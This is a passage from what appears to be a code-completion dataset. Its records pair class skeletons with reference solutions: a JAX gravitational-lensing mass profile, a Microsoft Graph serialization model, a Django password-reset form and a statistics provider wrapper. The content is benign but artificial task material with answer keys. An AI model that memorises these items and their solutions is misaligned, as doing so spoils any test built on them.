four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\n return omegas\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000450", "length_bytes": 13457, "license_type": "permissive", "methods": [{"docstring": "Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.", "name": "derivatives", "signature": "def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y)"}, {"docstring": "Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.", "name": "_complex_derivative", "signature": "def _complex_derivative(x, y, scale_length, axis_ratio, slope)"}, {"docstring": "Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.", "name": "_hypergeometric_series", "signature": "def _hypergeometric_series(ellip_angle, slope, axis_ratio)"}], "n_methods": 3, "prompt": "Implement the Python class `EPL` described below.\n\nClass description:\nElliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\n\nMethod signatures and docstrings:\n- def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y): Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\n- def _complex_derivative(x, y, scale_length, axis_ratio, slope): Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\n- def _hypergeometric_series(ellip_angle, slope, axis_ratio): Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.", "prompted_full_text": "Implement the Python class `EPL` described below.\n\nClass description:\nElliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\n\nMethod signatures and docstrings:\n- def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y): Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\n- def _complex_derivative(x, y, scale_length, axis_ratio, slope): Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\n- def _hypergeometric_series(ellip_angle, slope, axis_ratio): Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.\n\n<|skeleton|>\nclass EPL:\n \"\"\"Elliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\"\"\"\n\n def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y):\n \"\"\"Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\"\"\"\n <|body_0|>\n\n def _complex_derivative(x, y, scale_length, axis_ratio, slope):\n \"\"\"Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\"\"\"\n <|body_1|>\n\n def _hypergeometric_series(ellip_angle, slope, axis_ratio):\n \"\"\"Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\n scale_length = theta_e * jnp.sqrt(axis_ratio)\n complex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\n return (complex_derivative.real, complex_derivative.imag)\n<|end_body_0|>\n\n<|body_start_1|>\n ellip_vector = x * axis_ratio + 1j * y\n ellip_radius = jnp.abs(ellip_vector)\n ellip_angle = jnp.angle(ellip_vector)\n omega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\n return 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega\n<|end_body_1|>\n\n<|body_start_2|>\n flattening = (1 - axis_ratio) / (1 + axis_ratio)\n omegas = jnp.zeros_like(ellip_angle)\n four_n = 1 * jnp.exp(1j * ellip_angle)\n omegas += four_n\n four_factor = -flattening * jnp.exp(2j * ellip_angle)\n for n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\n return omegas\n<|end_body_2|>\n", "revision_id": "5573d9c5822f4e866b6692769963ae819cb3f10d", "skeleton": "<|skeleton|>\nclass EPL:\n \"\"\"Elliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\"\"\"\n\n def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y):\n \"\"\"Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\"\"\"\n <|body_0|>\n\n def _complex_derivative(x, y, scale_length, axis_ratio, slope):\n \"\"\"Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\"\"\"\n <|body_1|>\n\n def _hypergeometric_series(ellip_angle, slope, axis_ratio):\n \"\"\"Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class EPL:\n \"\"\"Elliptical Power Law mass profile. Elliptical Power Law mass profile functions, with calculation following those described in Tessore & Metcalf (2015) and implementation closely following the EPL_numba class in Lenstronomy.\"\"\"\n\n def derivatives(x, y, theta_e, slope, axis_ratio, angle, center_x, center_y):\n \"\"\"Calculate the derivative of the potential for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. theta_e: Einstein radius of the EPL profile. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio of the major and minor axis of ellipticity. angle: Clockwise angle of orientation of major axis. center_x: X-coordinate center of the EPL profile. center_y: Y-coordinate cetner of the EPL profile. Returns: X- and y-component of the derivatives.\"\"\"\n z = jnp.exp(-1j * angle) * (x - center_x + (y - center_y) * 1j)\n scale_length = theta_e * jnp.sqrt(axis_ratio)\n complex_derivative = EPL._complex_derivative(z.real, z.imag, scale_length, axis_ratio, slope) * jnp.exp(1j * angle)\n return (complex_derivative.real, complex_derivative.imag)\n\n def _complex_derivative(x, y, scale_length, axis_ratio, slope):\n \"\"\"Calculate the complex derivative for the EPL mass profile. Args: x: X-coordinates at which to evaluate the derivative. y: Y-coordinates at which to evaluate the derivative. scale_length: Scale length of the EPL mass profile (related to Einstein Radius by axis ratio). axis_ratio: Axis ratio of the major and minor axis of ellipticity. slope: Power-law slope of the EPL profile. Returns: Complex derivative at each (x,y) coordinate pair.\"\"\"\n ellip_vector = x * axis_ratio + 1j * y\n ellip_radius = jnp.abs(ellip_vector)\n ellip_angle = jnp.angle(ellip_vector)\n omega = EPL._hypergeometric_series(ellip_angle, slope, axis_ratio)\n return 2 * scale_length / (1 + axis_ratio) * jnp.nan_to_num((scale_length / ellip_radius) ** (slope - 2), copy=False) * omega\n\n def _hypergeometric_series(ellip_angle, slope, axis_ratio):\n \"\"\"Calculate the hypergeometric series required for the derivative. Args: ellip_angle: The elliptical angles at which to evaluate the series. slope: Power-law slope of the EPL profile. axis_ratio: Axis ratio the major and minor axis of ellipticity. Returns: The hypergeometric series sum for each angle.\"\"\"\n flattening = (1 - axis_ratio) / (1 + axis_ratio)\n omegas = jnp.zeros_like(ellip_angle)\n four_n = 1 * jnp.exp(1j * ellip_angle)\n omegas += four_n\n four_factor = -flattening * jnp.exp(2j * ellip_angle)\n for n in range(1, 200):\n four_n *= (2 * n - (3 - slope)) / (2 * n + (3 - slope)) * four_factor\n omegas += four_n\n return omegas\n", "source": "the_stack_v2_python_sparse", "source_path": "jaxstronomy/lens_models.py", "source_repo": "Jimmy-INL/google-research", "split": "test", "star_events_count": 1} {"blob_id": "db34fbd364648cb4e292bd5102c6d58ee6b52fc0", "bodies": ["if not parse_node:\n raise TypeError('parse_node cannot be null.')\nreturn RiskyUserHistoryItem()", "from .risk_user_activity import RiskUserActivity\nfrom .risky_user import RiskyUser\nfrom .risk_user_activity import RiskUserActivity\nfrom .risky_user import RiskyUser\nfields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\nsuper_fields = super().get_field_deserializers()\nfields.update(super_fields)\nreturn fields", "if not writer:\n raise TypeError('writer cannot be null.')\nsuper().serialize(writer)\nwriter.write_object_value('activity', self.activity)\nwriter.write_str_value('initiatedBy', self.initiated_by)\nwriter.write_str_value('userId', self.user_id)"], "bodies_text": "<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return RiskyUserHistoryItem()\n<|end_body_0|>\n\n<|body_start_1|>\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n fields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_object_value('activity', self.activity)\n writer.write_str_value('initiatedBy', self.initiated_by)\n writer.write_str_value('userId', self.user_id)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "RiskyUserHistoryItem", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RiskyUserHistoryItem:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return RiskyUserHistoryItem()\n<|end_body_0|>\n\n<|body_start_1|>\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n fields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_object_value('activity', self.activity)\n writer.write_str_value('initiatedBy', self.initiated_by)\n writer.write_str_value('userId', self.user_id)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000451", "length_bytes": 2658, "license_type": "permissive", "methods": [{"docstring": "Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005766", "prompt": "Implement the Python class `RiskyUserHistoryItem` described below.\n\nClass description:\nImplement the RiskyUserHistoryItem class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `RiskyUserHistoryItem` described below.\n\nClass description:\nImplement the RiskyUserHistoryItem class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass RiskyUserHistoryItem:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return RiskyUserHistoryItem()\n<|end_body_0|>\n\n<|body_start_1|>\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n fields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_object_value('activity', self.activity)\n writer.write_str_value('initiatedBy', self.initiated_by)\n writer.write_str_value('userId', self.user_id)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass RiskyUserHistoryItem:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RiskyUserHistoryItem:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> RiskyUserHistoryItem:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: RiskyUserHistoryItem\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return RiskyUserHistoryItem()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n from .risk_user_activity import RiskUserActivity\n from .risky_user import RiskyUser\n fields: Dict[str, Callable[[Any], None]] = {'activity': lambda n: setattr(self, 'activity', n.get_object_value(RiskUserActivity)), 'initiatedBy': lambda n: setattr(self, 'initiated_by', n.get_str_value()), 'userId': lambda n: setattr(self, 'user_id', n.get_str_value())}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_object_value('activity', self.activity)\n writer.write_str_value('initiatedBy', self.initiated_by)\n writer.write_str_value('userId', self.user_id)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/risky_user_history_item.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "153f267eaedd42cb199f155c8c0ddb694ae1f4a3", "bodies": ["logger.debug('Start clean data in ResetPasswordForm.')\nemail = self.cleaned_data.get('email')\nself.validator_all(email)\nlogger.debug('Exit clean data in ResetPasswordForm.')\nreturn super(ResetPasswordForm, self).clean(*args, **kwargs)", "logger.debug('Start validations in ResetPasswordForm.')\nvalidator = UserValidator()\nvalidator.validator_email_in_reset_password(email)\nlogger.debug('Exit validations in ResetPasswordForm.')"], "bodies_text": "<|body_start_0|>\n logger.debug('Start clean data in ResetPasswordForm.')\n email = self.cleaned_data.get('email')\n self.validator_all(email)\n logger.debug('Exit clean data in ResetPasswordForm.')\n return super(ResetPasswordForm, self).clean(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n logger.debug('Start validations in ResetPasswordForm.')\n validator = UserValidator()\n validator.validator_email_in_reset_password(email)\n logger.debug('Exit validations in ResetPasswordForm.')\n<|end_body_1|>\n", "class_docstring": "Form to reset password User", "class_name": "ResetPasswordForm", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ResetPasswordForm:\n \"\"\"Form to reset password User\"\"\"\n\n def clean(self, *args, **kwargs):\n \"\"\"Get patient fields.\"\"\"\n <|body_0|>\n\n def validator_all(self, email):\n \"\"\"Checks validator in all fields.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Start clean data in ResetPasswordForm.')\n email = self.cleaned_data.get('email')\n self.validator_all(email)\n logger.debug('Exit clean data in ResetPasswordForm.')\n return super(ResetPasswordForm, self).clean(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n logger.debug('Start validations in ResetPasswordForm.')\n validator = UserValidator()\n validator.validator_email_in_reset_password(email)\n logger.debug('Exit validations in ResetPasswordForm.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000452", "length_bytes": 1291, "license_type": "permissive", "methods": [{"docstring": "Get patient fields.", "name": "clean", "signature": "def clean(self, *args, **kwargs)"}, {"docstring": "Checks validator in all fields.", "name": "validator_all", "signature": "def validator_all(self, email)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000920", "prompt": "Implement the Python class `ResetPasswordForm` described below.\n\nClass description:\nForm to reset password User\n\nMethod signatures and docstrings:\n- def clean(self, *args, **kwargs): Get patient fields.\n- def validator_all(self, email): Checks validator in all fields.", "prompted_full_text": "Implement the Python class `ResetPasswordForm` described below.\n\nClass description:\nForm to reset password User\n\nMethod signatures and docstrings:\n- def clean(self, *args, **kwargs): Get patient fields.\n- def validator_all(self, email): Checks validator in all fields.\n\n<|skeleton|>\nclass ResetPasswordForm:\n \"\"\"Form to reset password User\"\"\"\n\n def clean(self, *args, **kwargs):\n \"\"\"Get patient fields.\"\"\"\n <|body_0|>\n\n def validator_all(self, email):\n \"\"\"Checks validator in all fields.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Start clean data in ResetPasswordForm.')\n email = self.cleaned_data.get('email')\n self.validator_all(email)\n logger.debug('Exit clean data in ResetPasswordForm.')\n return super(ResetPasswordForm, self).clean(*args, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n logger.debug('Start validations in ResetPasswordForm.')\n validator = UserValidator()\n validator.validator_email_in_reset_password(email)\n logger.debug('Exit validations in ResetPasswordForm.')\n<|end_body_1|>\n", "revision_id": "5387eb80dfb354e948abe64f7d8bbe087fc4f136", "skeleton": "<|skeleton|>\nclass ResetPasswordForm:\n \"\"\"Form to reset password User\"\"\"\n\n def clean(self, *args, **kwargs):\n \"\"\"Get patient fields.\"\"\"\n <|body_0|>\n\n def validator_all(self, email):\n \"\"\"Checks validator in all fields.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ResetPasswordForm:\n \"\"\"Form to reset password User\"\"\"\n\n def clean(self, *args, **kwargs):\n \"\"\"Get patient fields.\"\"\"\n logger.debug('Start clean data in ResetPasswordForm.')\n email = self.cleaned_data.get('email')\n self.validator_all(email)\n logger.debug('Exit clean data in ResetPasswordForm.')\n return super(ResetPasswordForm, self).clean(*args, **kwargs)\n\n def validator_all(self, email):\n \"\"\"Checks validator in all fields.\"\"\"\n logger.debug('Start validations in ResetPasswordForm.')\n validator = UserValidator()\n validator.validator_email_in_reset_password(email)\n logger.debug('Exit validations in ResetPasswordForm.')\n", "source": "the_stack_v2_python_sparse", "source_path": "medical_prescription/user/forms/resetpasswordform.py", "source_repo": "ristovao/2017.2-Receituario-Medico", "split": "test", "star_events_count": 0} {"blob_id": "8088bc5b2311607af3c9946eb29481f6881a7730", "bodies": ["if not provider:\n raise ValueError('Stats provider input must not be empty.')\nself._provider = provider\nself._methods = methods\nself._ignore_missing = ignore_missing", "instance = self._provider.provide(config, injector)\nif self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\nreturn instance"], "bodies_text": "<|body_start_0|>\n if not provider:\n raise ValueError('Stats provider input must not be empty.')\n self._provider = provider\n self._methods = methods\n self._ignore_missing = ignore_missing\n<|end_body_0|>\n\n<|body_start_1|>\n instance = self._provider.provide(config, injector)\n if self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\n return instance\n<|end_body_1|>\n", "class_docstring": "Add statistics to the results of another provider.", "class_name": "StatsProvider", "detected_licenses": ["LicenseRef-scancode-dco-1.1", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StatsProvider:\n \"\"\"Add statistics to the results of another provider.\"\"\"\n\n def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True):\n \"\"\"Initialize the statistics provider instance.\"\"\"\n <|body_0|>\n\n def provide(self, config: BaseSettings, injector: BaseInjector):\n \"\"\"Provide the object instance given a config and injector.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not provider:\n raise ValueError('Stats provider input must not be empty.')\n self._provider = provider\n self._methods = methods\n self._ignore_missing = ignore_missing\n<|end_body_0|>\n\n<|body_start_1|>\n instance = self._provider.provide(config, injector)\n if self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\n return instance\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000453", "length_bytes": 4857, "license_type": "permissive", "methods": [{"docstring": "Initialize the statistics provider instance.", "name": "__init__", "signature": "def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True)"}, {"docstring": "Provide the object instance given a config and injector.", "name": "provide", "signature": "def provide(self, config: BaseSettings, injector: BaseInjector)"}], "n_methods": 2, "prompt": "Implement the Python class `StatsProvider` described below.\n\nClass description:\nAdd statistics to the results of another provider.\n\nMethod signatures and docstrings:\n- def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True): Initialize the statistics provider instance.\n- def provide(self, config: BaseSettings, injector: BaseInjector): Provide the object instance given a config and injector.", "prompted_full_text": "Implement the Python class `StatsProvider` described below.\n\nClass description:\nAdd statistics to the results of another provider.\n\nMethod signatures and docstrings:\n- def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True): Initialize the statistics provider instance.\n- def provide(self, config: BaseSettings, injector: BaseInjector): Provide the object instance given a config and injector.\n\n<|skeleton|>\nclass StatsProvider:\n \"\"\"Add statistics to the results of another provider.\"\"\"\n\n def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True):\n \"\"\"Initialize the statistics provider instance.\"\"\"\n <|body_0|>\n\n def provide(self, config: BaseSettings, injector: BaseInjector):\n \"\"\"Provide the object instance given a config and injector.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not provider:\n raise ValueError('Stats provider input must not be empty.')\n self._provider = provider\n self._methods = methods\n self._ignore_missing = ignore_missing\n<|end_body_0|>\n\n<|body_start_1|>\n instance = self._provider.provide(config, injector)\n if self._methods:\n collector: Collector = injector.inject_or(Collector)\n if collector:\n collector.wrap(instance, self._methods, ignore_missing=self._ignore_missing)\n return instance\n<|end_body_1|>\n", "revision_id": "39cac36d8937ce84a9307ce100aaefb8bc05ec04", "skeleton": "<|skeleton|>\nclass StatsProvider:\n \"\"\"Add statistics to the results of another provider.\"\"\"\n\n def __init__(self, provider: BaseProvider, methods: Sequence[str], *, ignore_missing: bool=True):\n \"\"\"Initialize the statistics provider instance.\"\"\"\n <|body_0|>\n\n def 